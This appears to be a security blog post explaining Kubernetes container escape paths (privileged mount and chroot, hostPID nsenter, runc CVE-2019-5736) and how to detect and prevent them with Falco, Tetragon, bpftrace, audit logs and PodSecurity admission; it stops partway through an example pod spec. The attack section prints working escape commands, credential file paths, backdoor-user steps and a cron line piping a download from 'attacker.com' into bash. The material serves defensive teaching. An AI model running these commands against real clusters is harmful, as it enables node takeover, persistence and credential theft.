Kubernetes Container Escape: Attack Paths and eBPF Detection




TL;DR

  • Kubernetes container escape is OWASP A04 + A05: a container deployed with --privileged, hostPID, or hostNetwork is not meaningfully isolated from the host; with --privileged, a couple of commands produce a root shell on the node
  • The kernel does not enforce Kubernetes namespace semantics. Container isolation comes from Linux namespaces, cgroups, capabilities, and seccomp. --privileged strips the controls that make those boundaries hold, so root in the container is effectively root on the host
  • Three primary escape paths: privileged container with host device access, hostPID + nsenter, and runc CVEs (CVE-2019-5736) that allow a malicious container to overwrite the runc binary during exec
  • Detection requires kernel-level visibility: Falco fires on privileged container starts and on mount, nsenter, and chroot inside containers; Tetragon hooks mount and execve in the kernel and can kill the offending process, not just alert
  • The structural fix is PodSecurity admission enforcing the Restricted profile at the namespace level: policy that rejects --privileged, hostPID, hostNetwork, and hostPath volumes before a pod is ever admitted
  • Network policy as a secondary layer: blocking pod egress to the Kubernetes API server and cloud metadata limits what a compromised pod can reach; once an attacker runs in the node's own network namespace, pod NetworkPolicy no longer applies, so node-level firewalling has to cover that case

OWASP Mapping: A04 Insecure Design — --privileged placed in production workloads because the development environment never enforced boundaries. A05 Security Misconfiguration — absence of PodSecurity admission, RuntimeClass, and seccomp profiles.


The Big Picture

┌─────────────────────────────────────────────────────────────────────────┐
│              KUBERNETES CONTAINER ESCAPE — ATTACK SURFACE               │
│                                                                         │
│  ┌──────────────────────────────────────────────────────────────┐       │
│  │                     KUBERNETES NODE                          │       │
│  │                                                              │       │
│  │  ┌───────────────────────────────────────────────────────┐   │       │
│  │  │  Container (--privileged)                             │   │       │
│  │  │                                                       │   │       │
│  │  │  web app ──▶ exploit ──▶ shell in container          │   │       │
│  │  │                           │                           │   │       │
│  │  │  PATH 1: mount /dev/sda1  │                           │   │       │
│  │  │  ──────────────────────── ▼                           │   │       │
│  │  │  chroot /mnt/host → root shell on node                │   │       │
│  │  └───────────────────────────────────────────────────────┘   │       │
│  │                                                              │       │
│  │  ┌───────────────────────────────────────────────────────┐   │       │
│  │  │  Container (hostPID=true)                             │   │       │
│  │  │                                                       │   │       │
│  │  │  PATH 2: nsenter -t 1 -m -u -i -n -p -- bash         │   │       │
│  │  │  ─────────────────────────────────────────────────▶   │   │       │
│  │  │           root shell in host PID 1 namespaces         │   │       │
│  │  └───────────────────────────────────────────────────────┘   │       │
│  │                                                              │       │
│  │  ┌───────────────────────────────────────────────────────┐   │       │
│  │  │  Container (runc CVE)                                 │   │       │
│  │  │                                                       │   │       │
│  │  │  PATH 3: overwrite /proc/self/exe during runc exec    │   │       │
│  │  │  ─────────────────────────────────────────────────▶   │   │       │
│  │  │           arbitrary code execution as root on node    │   │       │
│  │  └───────────────────────────────────────────────────────┘   │       │
│  │                                                              │       │
│  │  Node root → kubelet creds + pod tokens → lateral movement   │       │
│  └──────────────────────────────────────────────────────────────┘       │
│                                                                         │
│  DETECTION LAYER        │  STRUCTURAL FIX                               │
│  Falco / Tetragon       │  PodSecurity Restricted                       │
│  mount syscall hooks    │  RuntimeClass (gVisor/Kata)                   │
│  audit logs             │  Seccomp + no-new-privileges                  │
└─────────────────────────────────────────────────────────────────────────┘

Kubernetes container escape is the point where a compromised application pod becomes a compromised Kubernetes node. From a node, an attacker reaches the kubelet credential, the service account tokens of every pod scheduled there, and often a path to cluster-admin. The boundary between container and host is not the Kubernetes API. It is Linux namespaces, cgroups, capabilities, and seccomp. When you remove those controls with --privileged, you remove the boundary.


The Incident: --privileged “Just for Debugging”

A networking issue in staging. The developer can’t get the CNI tracing they need from inside the normal container. Someone adds privileged: true to the container's securityContext to expose /sys/class/net and the raw packet socket. The PR merges. The staging deployment works. The flag stays in the manifest when staging gets promoted to production.

Six months later, the web application running in that pod has an RCE vulnerability. The attacker gets a shell.

Inside the container, three commands:

mkdir /mnt/host
mount /dev/sda1 /mnt/host
chroot /mnt/host /bin/bash

Root on the node. Not escalation through a kernel exploit. Not a zero-day. Just mounting the device that was always accessible because --privileged was set.

The node holds the kubelet's credential and the service account tokens of every pod scheduled on it, many with broader permissions than the compromised application ever needed. From the node, lateral movement into the cluster control plane is a matter of using credentials that are already there.

This is A04 (Insecure Design) and A05 (Security Misconfiguration) combined: the design didn’t account for what happens when the boundary is removed, and no enforcement mechanism prevented the configuration from reaching production.


Why the Kernel Doesn’t Know About Kubernetes

Kubernetes namespaces are a scheduler and API concept. When you create a Kubernetes namespace and apply RBAC to it, you are controlling what the Kubernetes API server will accept — you are not creating a kernel isolation boundary between workloads in different namespaces.

Kernel isolation comes from:

Linux namespaces (PID, net, mount, IPC, UTS, user)
  ├── Created by the OCI runtime (runc, driven by containerd or CRI-O)
  ├── Container processes run inside these namespaces
  └── From inside: host PIDs, host network, host filesystem are not visible

cgroups
  ├── Limit CPU and memory per container; the devices controller limits which device nodes it can open
  └── Prevent runaway resource consumption; the device allowlist is why host disks are normally unreachable

seccomp profiles
  ├── Filter system calls the container is allowed to invoke
  └── Block ptrace, mount, unshare, keyctl, and other syscalls that workloads rarely need and attackers often abuse

Capabilities
  ├── Fine-grained kernel privileges (CAP_NET_ADMIN, CAP_SYS_ADMIN, etc.)
  └── --privileged grants ALL capabilities, exposes all host devices, and disables seccomp and AppArmor

--privileged does not remove the namespaces themselves; it removes the controls that keep a process inside them. It grants every capability, lifts the device cgroup allowlist so the host's block devices appear under /dev, disables the default seccomp filter, and disables AppArmor confinement. A privileged container is effectively a process running on the host with a different filesystem view, and with mount, even that view can be changed.


Red Phase: The Three Escape Paths

Path 1: --privileged Container

A privileged container has CAP_SYS_ADMIN, which permits mount(2), and because the device cgroup no longer restricts it, the host's block devices are present under /dev. On a typical node, /dev/sda1 (or a device such as /dev/nvme0n1p1 on many cloud instances) holds the host root filesystem.

Check if the current container is privileged:

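# CapEff shows the effective capability set as a hex bitmask
# (/proc/1/status is the container's PID 1; /proc/self/status works too)
grep CapEff /proc/1/status
# CapEff: 0000003fffffffff   (full set; the exact value varies with kernel version)

# Decode it (capsh ships with libcap)
capsh --decode=0000003fffffffff | grep -o 'cap_sys_admin'
# cap_sys_admin: present means the container can mount (privileged, or SYS_ADMIN added explicitly)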
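capsh is not installed in many minimal images. As a sketch, the same decoding can be done in Python, assuming the bit numbering from the kernel's include/uapi/linux/capability.h (41 capabilities, through CAP_CHECKPOINT_RESTORE). `decode_capeff` and `can_mount` are illustrative names, not an existing tool.

```python
# Minimal sketch: decode a CapEff hex mask from /proc/<pid>/status into
# capability names. Bit positions follow include/uapi/linux/capability.h.
from typing import Set

CAP_NAMES = [
    "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER",
    "CAP_FSETID", "CAP_KILL", "CAP_SETGID", "CAP_SETUID", "CAP_SETPCAP",
    "CAP_LINUX_IMMUTABLE", "CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST",
    "CAP_NET_ADMIN", "CAP_NET_RAW", "CAP_IPC_LOCK", "CAP_IPC_OWNER",
    "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT", "CAP_SYS_PTRACE",
    "CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE",
    "CAP_SYS_RESOURCE", "CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG", "CAP_MKNOD",
    "CAP_LEASE", "CAP_AUDIT_WRITE", "CAP_AUDIT_CONTROL", "CAP_SETFCAP",
    "CAP_MAC_OVERRIDE", "CAP_MAC_ADMIN", "CAP_SYSLOG", "CAP_WAKE_ALARM",
    "CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ", "CAP_PERFMON", "CAP_BPF",
    "CAP_CHECKPOINT_RESTORE",
]


def decode_capeff(hex_mask: str) -> Set[str]:
    """Return the capability names whose bits are set in a CapEff hex string."""
    value = int(hex_mask, 16)
    names = {name for bit, name in enumerate(CAP_NAMES) if value & (1 << bit)}
    # Bits beyond the table (capabilities added by newer kernels) are kept generically.
    for bit in range(len(CAP_NAMES), value.bit_length()):
        if value & (1 << bit):
            names.add(f"CAP_UNKNOWN_{bit}")
    return names


def can_mount(hex_mask: str) -> bool:
    """mount(2) and setns(2) need CAP_SYS_ADMIN, so its presence is the key signal."""
    return "CAP_SYS_ADMIN" in decode_capeff(hex_mask)


if __name__ == "__main__":
    # Full set (pre-5.8 kernel) versus Docker's default capability set.
    for mask in ("0000003fffffffff", "00000000a80425fb"):
        print(mask, len(decode_capeff(mask)), "caps, CAP_SYS_ADMIN:", can_mount(mask))
```

Pasting the CapEff value from /proc/1/status into decode_capeff gives the same answer as capsh; 00000000a80425fb, Docker's default set, decodes to 14 capabilities without CAP_SYS_ADMIN.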

Full escape sequence:

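# Step 1: Identify the host block device
# The container root is an overlay mount, so it does not name the device
grep ' / ' /proc/mounts
# overlay / overlay rw,...,upperdir=/var/lib/containerd/... 0 0

# Files the runtime bind-mounts from the host usually do name it
grep -E ' /etc/(hosts|hostname|resolv\.conf) ' /proc/mounts
# /dev/sda1 /etc/hosts ext4 rw,relatime 0 0

# Or list block devices directly; they are visible because --privileged exposes host /dev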
lsblk
# NAME   MAJ:MIN RM  SIZE RO TYPE MOUNTPOINTS
# sda      8:0    0   80G  0 disk
# ├─sda1   8:1    0   79G  0 part /
# └─sda2   8:2    0    1G  0 part [SWAP]

# Step 2: Mount host root filesystem
mkdir -p /mnt/host
mount /dev/sda1 /mnt/host

# Step 3a: Write attacker SSH key to host authorized_keys
echo "ssh-rsa AAAA..." >> /mnt/host/root/.ssh/authorized_keys

# Step 3b: Or take an immediate root shell via chroot
chroot /mnt/host /bin/bash
# Now running as root in the host filesystem
# id: uid=0(root) gid=0(root)

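# Step 4: From host root, collect node credentials
# (kubeadm default paths; other distributions differ)
cat /etc/kubernetes/kubelet.conf       # kubelet kubeconfig for API server access
ls /var/lib/kubelet/pki/               # kubelet client cert/key (kubelet-client-current.pem)
ls /var/lib/kubelet/pods/*/volumes/kubernetes.io~projected/   # service account tokens of pods on this node
# /etc/kubernetes/pki/ca.crt is public; the client cert and the tokens are the credentials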
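The device-discovery part of Step 1 relies on a detail of /proc/mounts: the overlay root hides the device, but files the runtime bind-mounts from the host (commonly /etc/hosts, /etc/hostname, /etc/resolv.conf, and in Kubernetes /dev/termination-log) usually list the host block device as their source. A minimal sketch of that lookup, assuming the standard whitespace-separated /proc/mounts format (source, mount point, fstype, options, dump, pass); `host_devices` and the hint list are illustrative.

```python
# Minimal sketch: find host block devices that back bind mounts listed in
# /proc/mounts. Assumes the standard "source target fstype options 0 0" format.
from typing import Dict, List

BIND_MOUNT_HINTS = ("/etc/hosts", "/etc/hostname", "/etc/resolv.conf",
                    "/dev/termination-log")


def host_devices(mounts_text: str) -> Dict[str, List[str]]:
    """Map each /dev/* mount source to the bind-mounted container paths it backs."""
    found: Dict[str, List[str]] = {}
    for line in mounts_text.splitlines():
        fields = line.split()
        if len(fields) < 3:
            continue  # skip blank or malformed lines
        source, target = fields[0], fields[1]
        if source.startswith("/dev/") and target in BIND_MOUNT_HINTS:
            found.setdefault(source, []).append(target)
    return found


if __name__ == "__main__":
    sample = "overlay / overlay rw 0 0\n/dev/sda1 /etc/hosts ext4 rw,relatime 0 0\n"
    print(host_devices(sample))
```

Inside a container, feeding it the contents of /proc/mounts shows which host device to pass to mount; on many cloud nodes the answer is an NVMe partition rather than /dev/sda1.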

What persistence looks like from node root:

# Add a backdoor user to host /etc/passwd
chroot /mnt/host useradd -m -s /bin/bash -G sudo backdoor
chroot /mnt/host passwd backdoor

# Or: schedule a cron job on the host
echo "* * * * * root curl http://attacker.com/c2 | bash" \
  >> /mnt/host/etc/cron.d/maintenance

Path 2: hostPID / hostNetwork Escape

hostPID: true is a less obvious escape path than --privileged. When a container shares the host PID namespace, it can see every process running on the node, including PID 1, which runs in the host’s full namespace set. Even without extra privileges, it can read every process’s command line, which sometimes carries secrets.

Combined with root and CAP_SYS_ADMIN (in practice, hostPID plus privileged: true, the pattern node-debugging pods use), nsenter produces a host root shell without mounting anything:

# From inside the container — see all host processes
ps aux
# This will show containerd, kubelet, systemd, sshd — everything on the node

# nsenter: enter the namespaces of PID 1 (host init process)
# -t 1: target PID 1
# -m: enter mount namespace (host filesystem)
# -u: enter UTS namespace (host hostname)
# -i: enter IPC namespace
# -n: enter network namespace
# -p: enter PID namespace
nsenter -t 1 -m -u -i -n -p -- bash

# Now running in host namespaces
hostname   # shows node hostname, not container hostname
mount | grep " / "  # shows host root mount, not container overlay
id         # uid=0(root) gid=0(root)

nsenter is a util-linux utility that joins the namespaces of an existing process using setns(2), which requires CAP_SYS_ADMIN. With -t 1 it enters PID 1’s namespaces, which are the host’s namespaces. The result is a shell that sees the host filesystem, host network, and host process tree as if running directly on the node.

hostNetwork: true on its own does not directly produce a root shell, but it places the pod in the node’s network namespace: it can bind host ports, reach services listening on the node’s loopback interface, and most CNIs do not apply pod NetworkPolicy to its traffic. It also sidesteps an IMDSv2 hop limit of 1, which normally keeps pods away from the cloud provider’s instance metadata service (IMDS), enabling credential theft from the node’s IAM role: the attack path covered in SSRF to cloud metadata and IMDSv1 exploitation.
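Whether a pod really shares the host PID namespace can be checked from inside it without nsenter. A minimal sketch, assuming the kernel's fixed inode for the initial PID namespace (PROC_PID_INIT_INO, 0xEFFFFFFC). Nested setups such as kind nodes run in a child PID namespace, so there the comparison value is the node's own readlink /proc/1/ns/pid. The function names are illustrative.

```python
# Minimal sketch: decide whether a process shares the host's initial PID
# namespace (what hostPID: true produces). The kernel gives the initial PID
# namespace the fixed inode 0xEFFFFFFC (PROC_PID_INIT_INO).
import os
import re

PROC_PID_INIT_INO = 0xEFFFFFFC  # 4026531836

_NS_LINK = re.compile(r"^(\w+):\[(\d+)\]$")


def ns_inode(link_text: str) -> int:
    """Parse a namespace link target such as 'pid:[4026531836]' into its inode."""
    match = _NS_LINK.match(link_text)
    if not match:
        raise ValueError(f"not a namespace link: {link_text!r}")
    return int(match.group(2))


def in_host_pid_ns(link_text: str) -> bool:
    return ns_inode(link_text) == PROC_PID_INIT_INO


if __name__ == "__main__" and os.path.exists("/proc/self/ns/pid"):
    link = os.readlink("/proc/self/ns/pid")
    print(link, "-> host PID namespace" if in_host_pid_ns(link) else "-> own PID namespace")
```

The same inode is what the Tetragon matchNamespaces selector later in this post compares against.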

Path 3: runc CVE Escape (CVE-2019-5736)

CVE-2019-5736 is a different attack class — it does not require a misconfiguration in the pod spec. It exploits a race condition in the runc container runtime itself.

The mechanism:

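1. Attacker controls the container image (or already has root inside the container)
2. A binary the operator is likely to exec, such as /bin/sh, is replaced with a #!/proc/self/exe script
3. Operator runs: kubectl exec -it <pod> -- /bin/sh
4. runc joins the container and execs /bin/sh; the shebang makes the kernel re-execute /proc/self/exe, which is the host's runc binary
5. A malicious process in the container opens that binary through /proc/<runc-pid>/exe (O_PATH)
6. Race: while runc is running, writes fail with ETXTBSY, so the attacker keeps reopening /proc/self/fd/<n> for writing until runc exits, then overwrites the host runc binary
7. The next time runc runs on the node (any container start or exec), the attacker's binary runs as root on the host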

The detection signature for runc-class escapes is a container process opening /proc/<pid>/exe or /proc/self/fd/<n> for writing, or writing to the host path of the runc binary:

# Simplified bpftrace view of the CVE-2019-5736 pattern (observation only):
# opens under /proc with a write access mode (O_WRONLY=1, O_RDWR=2), which is
# how the exploit reopens the runc binary via /proc/self/fd/<n>.
# Noisy: runtimes also open files such as /proc/self/oom_score_adj for writing.
# Tetragon implements a targeted version of this as a continuous policy.

bpftrace -e '
tracepoint:syscalls:sys_enter_openat {
  if ((args->flags & 3) != 0 &&
      strncmp(str(args->filename), "/proc/", 6) == 0) {
    printf("PID %d comm %s write-open %s\n", pid, comm, str(args->filename));
  }
}
' 2>/dev/null | head -20

Patched versions of runc (1.0.0-rc7+, containerd 1.2.3+) fix the race condition. The practical implication: node patching is the only fix for runc-class CVEs — pod security policy cannot prevent a vulnerability in the container runtime itself.

Safe Simulation: Audit Your Cluster Before an Attacker Does

These commands are read-only and safe to run against any cluster you have kubectl access to:

# Find all pods running with --privileged
kubectl get pods -A -o json | \
  jq -r '.items[] |
    select(.spec.containers[].securityContext.privileged == true) |
    [.metadata.namespace, .metadata.name, 
     (.spec.containers[] | select(.securityContext.privileged == true) | .name)] |
    join(" / ")' | \
  sort -u

# Find pods with hostPID or hostNetwork
kubectl get pods -A -o json | \
  jq -r '.items[] |
    select(.spec.hostPID == true or .spec.hostNetwork == true) |
    [.metadata.namespace, .metadata.name,
     (if .spec.hostPID then "hostPID" else empty end),
     (if .spec.hostNetwork then "hostNetwork" else empty end)] |
    join(" / ")' | \
  sort -u

# Check for pods using hostPath mounts (host filesystem access via volume)
kubectl get pods -A -o json | \
  jq -r '.items[] |
    select(.spec.volumes[]?.hostPath != null) |
    [.metadata.namespace, .metadata.name,
     (.spec.volumes[] | select(.hostPath != null) |
      .name + "→" + .hostPath.path)] |
    join(" / ")' | \
  sort -u

# Check DaemonSets — these often run privileged and cover every node
kubectl get daemonsets -A -o json | \
  jq -r '.items[] |
    select(.spec.template.spec.containers[].securityContext.privileged == true) |
    [.metadata.namespace, .metadata.name] | join("/")' | \
  sort -u
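The jq queries above inspect only regular containers. A sketch of the same audit in Python that also covers initContainers and ephemeralContainers and flags an explicit SYS_ADMIN capability add, assuming the JSON shape returned by kubectl get pods -A -o json; the file-argument entry point is a hypothetical convenience.

```python
# Minimal sketch: audit `kubectl get pods -A -o json` output for escape-enabling
# settings. Field names follow the Kubernetes Pod API.
import json
import sys
from typing import List


def pod_findings(pod: dict) -> List[str]:
    spec = pod.get("spec", {})
    findings = [f for f in ("hostPID", "hostNetwork", "hostIPC") if spec.get(f)]
    for kind in ("initContainers", "containers", "ephemeralContainers"):
        for c in spec.get(kind) or []:
            sc = c.get("securityContext") or {}
            if sc.get("privileged"):
                findings.append(f"privileged:{c.get('name')}")
            added = (sc.get("capabilities") or {}).get("add") or []
            if {"SYS_ADMIN", "CAP_SYS_ADMIN"} & set(added):
                findings.append(f"SYS_ADMIN:{c.get('name')}")
    for vol in spec.get("volumes") or []:
        if "hostPath" in vol:
            findings.append(f"hostPath:{vol.get('name')}->{vol['hostPath'].get('path')}")
    return findings


def audit(pod_list: dict) -> List[str]:
    rows = []
    for pod in pod_list.get("items", []):
        meta = pod.get("metadata", {})
        findings = pod_findings(pod)
        if findings:
            rows.append(f"{meta.get('namespace')}/{meta.get('name')}: {', '.join(findings)}")
    return sorted(rows)


if __name__ == "__main__" and len(sys.argv) > 1:
    with open(sys.argv[1]) as f:
        for row in audit(json.load(f)):
            print(row)
```

Usage: save kubectl get pods -A -o json to pods.json and pass that path as the script's only argument.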

Blue Phase: eBPF Detection

Detecting container escape attempts requires visibility below the Kubernetes API layer. Audit logs show pod creation — they do not show what a process inside the container does with mount, nsenter, or /proc/self/exe. eBPF-based tools (Falco, Tetragon) attach to kernel hooks and observe syscalls regardless of what namespace or container they originate from.

Falco: Privileged Container and Mount Detection

# Falco rules for container escape detection
# /etc/falco/rules.d/container-escape.yaml

# Rule 1: Privileged container started
- rule: Privileged Container Started
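  desc: >
    A container running with --privileged was started. It has every
    capability and runs without the default seccomp or AppArmor profile.
    Matches once per container, on the exec of its PID 1.
  condition: >
    evt.type in (execve, execveat) and evt.dir = < and
    container.id != host and
    container.privileged = true and
    proc.vpid = 1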
  output: >
    Privileged container started
    (user=%user.name user_uid=%user.uid
     command=%proc.cmdline
     container_id=%container.id
     container_name=%container.name
     image=%container.image.repository:%container.image.tag
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: WARNING
  tags: [container, privilege-escalation, OWASP-A05]

# Processes allowed to mount inside containers (hypothetical starting
# list; tune it, and note that name-based exclusions can be spoofed)
- list: container_runtime_processes
  items: [runc, crun, containerd-shim]

# Rule 2: Mount syscall from inside a container
- rule: Container Mount Syscall
  desc: >
    A process inside a container invoked mount().
    Without CAP_SYS_ADMIN this fails; in a privileged container
    it succeeds and may be mounting host block devices.
  condition: >
    evt.type = mount and evt.dir = < and
    container.id != host and
    not proc.name in (container_runtime_processes)
  output: >
    Mount syscall from container
    (user=%user.name
     command=%proc.cmdline
     mount_source=%evt.arg.dev
     mount_target=%evt.arg.dir
     fstype=%evt.arg.type
     container_id=%container.id
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: ERROR
  tags: [container, privilege-escalation, OWASP-A04]

# Rule 3: nsenter or chroot invoked inside container
- rule: Namespace Enter or Chroot in Container
  desc: >
    nsenter or chroot executed from within a running container.
    nsenter with -t 1 enters host namespaces directly.
  condition: >
    evt.type in (execve, execveat) and evt.dir = < and
    container.id != host and
    proc.name in (nsenter, chroot)
  output: >
    nsenter/chroot executed in container
    (user=%user.name
     command=%proc.cmdline
     parent=%proc.pname
     container_id=%container.id
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: ERROR
  tags: [container, privilege-escalation, T1611]

# Rule 4: Process reading host PID tree (hostPID indicator)
- rule: Container Reading Host Process List
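  desc: >
    A process inside a container is reading /proc/<pid>/status entries.
    With hostPID=true these are host processes; without it they are the
    container's own (ps does this), so the rule is noisy and best scoped
    to pods known to run with hostPID.
  condition: >
    evt.type in (open, openat, openat2) and evt.dir = < and
    fd.name startswith /proc/ and
    fd.name endswith /status and
    container.id != host and
    not fd.name startswith /proc/self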
  output: >
    Container reading host process status
    (proc=%proc.cmdline fd=%fd.name
     container_id=%container.id
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: WARNING
  tags: [container, discovery, T1057]

Tetragon: TracingPolicy for nsenter and Mount Syscalls

Tetragon attaches eBPF programs to kernel functions (kprobes, as in the policy below), tracepoints, and LSM hooks. Where Falco observes syscall events and evaluates rules in userspace, Tetragon can act inside the kernel: the Sigkill action terminates the offending process synchronously, and the Override action makes a hooked syscall return an error instead of running.

# Tetragon TracingPolicy: detect and optionally block container escape attempts
# TracingPolicy is cluster-scoped, so it takes no metadata.namespace
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: container-escape-detection
spec:
  kprobes:
    # Hook 1: mount() from any process outside the host PID namespace
    - call: "sys_mount"
      return: false
      syscall: true
      args:
        - index: 0
          type: "string"     # source device (e.g. /dev/sda1)
        - index: 1
          type: "string"     # target mount point
        - index: 2
          type: "string"     # filesystem type
      selectors:
        - matchNamespaces:
          - namespace: Pid
            operator: NotIn
            values:
              # 4026531836 (0xEFFFFFFC) is the kernel's fixed inode for the
              # initial PID namespace; confirm with readlink /proc/1/ns/pid.
              # hostPID pods share this namespace and are NOT covered here.
              - "4026531836"
          matchActions:
          - action: Post        # Post = log; change to Sigkill to enforce

    # Hook 2: execve of an nsenter binary (path-based: a renamed copy evades it)
    - call: "sys_execve"
      return: false
      syscall: true
      args:
        - index: 0
          type: "string"     # filename being executed
      selectors:
        - matchArgs:
          - index: 0
            operator: Postfix
            values:
              - "/nsenter"
          matchActions:
          - action: Post

    # Hook 3: runc CVE class indicator. /proc/self/exe resolves to the real
    # binary path, so match the host runc path (adjust to your nodes).
    - call: "vfs_write"
      return: false
      syscall: false
      args:
        - index: 0
          type: "file"
      selectors:
        - matchArgs:
          - index: 0
            operator: Postfix
            values:
              - "/runc"
          matchNamespaces:
          - namespace: Pid
            operator: NotIn
            values:
              - "4026531836"
          matchActions:
          - action: Sigkill   # no legitimate reason for a container to write the runc binary

bpftrace: Quick Node-Level Validation

Before deploying Tetragon, you can validate that mount syscalls are observable from the host using bpftrace directly on a node:

# Run on the Kubernetes node as root
# Safe observation mode — shows mount attempts from any process including containers

bpftrace -e '
tracepoint:syscalls:sys_enter_mount {
  printf("%-8d %-20s %-30s -> %-30s type=%s\n",
    pid, comm,
    str(args->dev_name),   // source device
    str(args->dir_name),   // mount target
    str(args->type));      // filesystem type
}
' 2>/dev/null
# Sample output:
# 38471    bash                 /dev/sda1                      -> /mnt/host                      type=ext4
# A shell mounting a host block device is an escape attempt in progress;
# confirm the PID is containerized by checking /proc/38471/cgroup

# Watch for nsenter executions across all processes on the node
bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
  if (str(args->filename) == "/usr/bin/nsenter" ||
      str(args->filename) == "/bin/nsenter") {
    printf("nsenter called: pid=%d ppid=%d comm=%s\n",
      pid, curtask->real_parent->pid, comm);
  }
}
' 2>/dev/null
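The comm column alone does not say whether a PID from these traces is inside a container. On the node, /proc/<pid>/cgroup usually does, because container runtimes embed the 64-hex-character container ID in the cgroup path. A sketch, assuming the systemd or cgroupfs naming used by containerd, CRI-O, and Docker; the helper names are illustrative, and the returned ID can be passed to crictl inspect.

```python
# Minimal sketch: attribute a PID from bpftrace output to a container by
# reading /proc/<pid>/cgroup on the node. Assumes containerd/CRI-O/Docker
# cgroup naming, where the 64-hex container ID is a path component.
import re
from typing import Optional

_CONTAINER_ID = re.compile(r"(?:cri-containerd-|crio-|docker-)?([0-9a-f]{64})(?:\.scope)?")


def container_id_from_cgroup(cgroup_text: str) -> Optional[str]:
    """Return the container ID found in /proc/<pid>/cgroup text, or None for host processes."""
    for line in cgroup_text.splitlines():
        path = line.split(":", 2)[-1]  # "hierarchy-id:controllers:path"
        for part in reversed(path.split("/")):
            match = _CONTAINER_ID.fullmatch(part)
            if match:
                return match.group(1)
    return None


def container_id_for_pid(pid: int) -> Optional[str]:
    try:
        with open(f"/proc/{pid}/cgroup") as f:
            return container_id_from_cgroup(f.read())
    except FileNotFoundError:
        return None  # process already exited (or not running on Linux)
```

A None result for a mounting bash process means it runs on the host itself; a container ID means the escape attempt came from a pod.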

What Kubernetes Audit Logs Show (and What They Miss)

Kubernetes audit logs record API server activity. They show a pod being created with privileged: true, but only if the audit policy logs pod create requests at Request or RequestResponse level. They do not show anything that happens inside the container after it starts.

# Enable audit policy to capture pod creation with privileged spec
# /etc/kubernetes/audit-policy.yaml (excerpt)

apiVersion: audit.k8s.io/v1
kind: Policy
rules:
  # Log pod creation at RequestResponse level (captures full spec)
  - level: RequestResponse
    resources:
      - group: ""
        resources: ["pods"]
    verbs: ["create", "update", "patch"]

  # Log exec into pods: this is the entry point for escape attempts
  # (SPDY clients send create; WebSocket-based exec can arrive as get)
  - level: RequestResponse
    resources:
      - group: ""
        resources: ["pods/exec"]
    verbs: ["create", "get"]

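# Parse audit log (JSON lines, path set by --audit-log-path) for privileged pod creation
grep '"privileged":true' /var/log/kubernetes/audit.log | \
  jq -r 'select(.objectRef.resource == "pods" and .verb == "create"
                and .stage == "ResponseComplete") | [
    .requestReceivedTimestamp,
    .user.username,
    .objectRef.namespace + "/" + (.objectRef.name // .requestObject.metadata.name // "?"),
    "privileged=true"
  ] | join(" | ")'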

# Note: kubectl get events does not read the audit log. Events such as
# "Created container app" carry no pod spec, so filtering them for
# "privileged" finds nothing; query live pod specs instead (see the
# Safe Simulation queries).
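Grepping raw lines also matches events whose response body mentions privileged, and each request appears twice (RequestReceived and ResponseComplete stages). A sketch that parses each event instead, assuming a RequestResponse-level policy like the one above so requestObject is populated; `risky_pod_creates` is an illustrative name.

```python
# Minimal sketch: scan a Kubernetes audit log (one JSON event per line) for pod
# create requests that ask for privileged containers or host namespaces.
import json
from typing import Iterable, Iterator


def risky_pod_creates(lines: Iterable[str]) -> Iterator[str]:
    for line in lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        ref = event.get("objectRef") or {}
        if ref.get("resource") != "pods" or ref.get("subresource") or event.get("verb") != "create":
            continue
        if event.get("stage") != "ResponseComplete":
            continue  # report each request once
        obj = event.get("requestObject") or {}
        spec = obj.get("spec") or {}
        reasons = [f for f in ("hostPID", "hostNetwork", "hostIPC") if spec.get(f)]
        for c in (spec.get("initContainers") or []) + (spec.get("containers") or []):
            if (c.get("securityContext") or {}).get("privileged"):
                reasons.append(f"privileged:{c.get('name')}")
        if reasons:
            meta = obj.get("metadata") or {}
            name = ref.get("name") or meta.get("name") or meta.get("generateName", "?")
            yield " | ".join([
                event.get("requestReceivedTimestamp", "?"),
                (event.get("user") or {}).get("username", "?"),
                f"{ref.get('namespace')}/{name}",
                ",".join(reasons),
            ])
```

Usage: open the audit log file and pass the file object directly; the function reads it line by line.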

The audit log gap is important to understand: audit logs are a first-alert layer for misconfigured pod creation, not a detection layer for in-progress escape. By the time you see a pod/exec event in audit logs, the attacker already has a shell. eBPF-based detection at the syscall level is what catches the escape itself.


Purple Phase: Structural Fixes

Fix 1: PodSecurity Admission — Enforce Restricted Profile

PodSecurity admission (built in and GA since Kubernetes 1.25, replacing the removed PodSecurityPolicy) enforces the Pod Security Standards at the namespace level. The Baseline level already blocks --privileged, hostPID, hostNetwork, and hostPath volumes; Restricted adds requirements such as dropping all capabilities, running as non-root, and setting a seccomp profile.

# Enforce the Restricted PodSecurity profile on a namespace
# This blocks any pod that doesn't meet the criteria from scheduling
apiVersion: v1
kind: Namespace
metadata:
  name: production
  labels:
    # enforce: pod is rejected at admission if spec violates Restricted
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/enforce-version: latest
    # audit: violations are logged but not rejected (useful for rollout)
    pod-security.kubernetes.io/audit: restricted
    pod-security.kubernetes.io/audit-version: latest
    # warn: user gets a warning but pod is allowed (for migration)
    pod-security.kubernetes.io/warn: restricted
    pod-security.kubernetes.io/warn-version: latest

What Restricted profile blocks (relevant to escape paths):

# A pod spec that passes Restricted. Set these explicitly so admission
# does not reject your workloads.
apiVersion: v1
kind: Pod
metadata:
  name: app
spec:
  hostPID: false           # must be false (blocks Path 2)
  hostNetwork: false       # must be false
  hostIPC: false           # must be false
  securityContext:         # pod-level
    runAsNonRoot: true
    seccompProfile:
      type: RuntimeDefault    # or Localhost with a custom profile
  containers:
    - name: app
      image: registry.example.com/app:1.0   # placeholder image
      securityContext:
        allowPrivilegeEscalation: false
        privileged: false          # blocks Path 1
        capabilities:
